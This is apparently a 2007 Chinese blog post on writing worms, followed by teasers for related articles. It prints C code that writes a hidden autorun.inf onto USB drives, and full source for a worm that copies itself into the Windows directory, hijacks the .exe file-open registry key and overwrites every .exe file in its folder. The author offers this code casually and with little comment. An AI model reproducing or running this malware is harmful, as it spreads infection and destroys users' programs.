一些蠕虫的写法。。

原创 2007年10月07日 15:33:00
下面是最常见的感染U盘的代码,很好理解,网上的代码,没有改。

void cfile(LPCTSTR drivers)
{
HANDLE hCFN;
char ch1[MAX_PATH];
DWORD filesize1 , wsize;
wsprintf(ch1,"%sautorun.inf",drivers);
char autorunc[]="[AutoRun] /n open=Recycled//notepad.exe /n ` /n shell//open=打开(&O)/nshell//open//Command=Recycled//notepad.exe /n shell//open//Default=1";
filesize1=sizeof(autorunc);
hCFN=CreateFile(ch1,GENERIC_WRITE,0,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM,NULL);
WriteFile(hCFN,autorunc,filesize1-1,&wsize,NULL);
SetFileAttributes(ch1,FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM);
CloseHandle(hCFN);
}
还有这一段代码很有意思,作者貌似是俄罗斯人的一个新人,你可以在29A的论坛上找到这段代码,基本上就说明了如何自启动,但是没有做基本的除错和传播,还有他是暴力覆盖方法。。。类似前一阵子的小浩,编译了后不要随便运行。。。否则后果自负。
#include "windows.h"
#include "string.h"

int main(int argc, char *fuck[])
{
char windir[200];
char dropper[10]="//supa.exe";
char param1[4]=" %1";
char subkey[40]="exefile//shell//open//command";
HANDLE find_handle;
WIN32_FIND_DATA ff;
char msg1[200]="[ Worm Win32 -+w32.exe.IRC+- For The Mather Russia and Zaicev Dimon ]";

GetWindowsDirectoryA(windir,100);
lstrcatA(windir,dropper);
CopyFileA(fuck[0],windir,0);

lstrcatA(windir,param1);
RegOpenKeyA(HKEY_CLASSES_ROOT,subkey,0);
RegSetValueA(HKEY_CLASSES_ROOT,subkey,REG_SZ,windir,sizeof(windir));
RegCloseKey(HKEY_CLASSES_ROOT);

if (argc>1)
{
CopyFileA(fuck[0],fuck[1],0);
exit(0);
}

find_handle=FindFirstFileA("*.exe",&ff);
while (1)

{
CopyFileA(fuck[0],ff.cFileName,0);
if (!FindNextFileA(find_handle,&ff)) break;

}
FindClose(find_handle);
return (0);
}
 都没啥技术含量,权当一乐。

web蠕虫编写过程

*导言      *自动化    *搜集目标 *绕过IDS,多态性和通讯        *结语      ===导言===                        ...
  • liuhuihlf
  • liuhuihlf
  • 2016年12月10日 12:23
  • 1231

蠕虫病毒编写技术

 现在蠕虫病毒泛滥,网络安全越来越受到威胁,其实主要方面是一是国内人员技术水平的提高,二是相关技术公开程度也越来越高,其实现在的蠕虫病毒大多属于文件病毒,相关技术也比较简单,本意在于揭开病毒的面纱,了...
  • iiprogram
  • iiprogram
  • 2008年04月16日 22:02
  • 1283

渗透测试笔记:爬虫变蠕虫的故事

写这篇文,主要想以日记的形式记录下我在整个测试(gongji)过程中的 心路历程、所用技术、填的坑等等。。 为了让文章显得不那么呆板,不那么流水,我尽量使用一些文艺点的词汇。 9月份的广州,一天...
  • qq_30123355
  • qq_30123355
  • 2016年09月07日 20:04
  • 1454

XSS蠕虫攻击案例学习

看了下网站基于jQuery,那构造一个xss worm就简单很多(没有也无所谓,我们自己加载进去也可以的)...
  • xing_anksh
  • xing_anksh
  • 2014年04月14日 11:24
  • 1161

病毒、蠕虫与木马之间的区别

病毒、蠕虫与木马之间的区别 2013-06-26 11:14:34  www.hackbase.com  来源:互联网 病毒、蠕虫与木马之间的区别 随着互联网的日益流行,各种病毒木马...
  • cool_blow_chilly
  • cool_blow_chilly
  • 2015年05月03日 14:29
  • 352

威金蠕虫病毒症状和清除解决方法

电脑中威金病毒的症状和病毒表现:   1. 某些杀毒软件的实时监控无法启动(例如:瑞星的实时监控中心)     2. 部分图标变得模糊     3. 进程里面出现例如 Logo_1.exe ...
  • axl19530209
  • axl19530209
  • 2015年01月03日 08:57
  • 813

防范勒索蠕虫病毒入侵,3分钟教你快速关闭高危端口445!

“永恒之蓝”的外衣是多么的美妙,“勒索蠕虫病毒”的内在是多么的丑陋!...
  • Summer_Hanson
  • Summer_Hanson
  • 2017年05月16日 10:47
  • 1248

5-17 爬动的蠕虫 (15分)

一条蠕虫长1寸,在一口深为N寸的井的底部。已知蠕虫每1分钟可以向上爬U寸,但必须休息1分钟才能接着往上爬。在休息的过程中,蠕虫又下滑了D寸。就这样,上爬和下滑重复进行。请问,蠕虫需要多长时间才能爬出井...
  • qq_26570353
  • qq_26570353
  • 2016年04月02日 11:24
  • 1276

web蠕虫编写过程

*导言      *自动化    *搜集目标 *绕过IDS,多态性和通讯        *结语      ===导言===                        ...
  • liuhuihlf
  • liuhuihlf
  • 2016年12月10日 12:23
  • 1231

蠕虫病毒Worm: VBS/Jenxcus!lnk 解决方案 Python脚本

表现:U盘里所有根目录文件夹/文件都变成了快捷方式。 传播方式:U盘。多发于打印店等无保护公共设备。 原因:文件夹/文件属性被设为隐藏的系统文件 Win+R //进入cmd E: //进入U盘...
  • karmayh
  • karmayh
  • 2017年04月20日 16:36
  • 498
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:一些蠕虫的写法。。
举报原因:
原因补充:

(最多只允许输入30个字)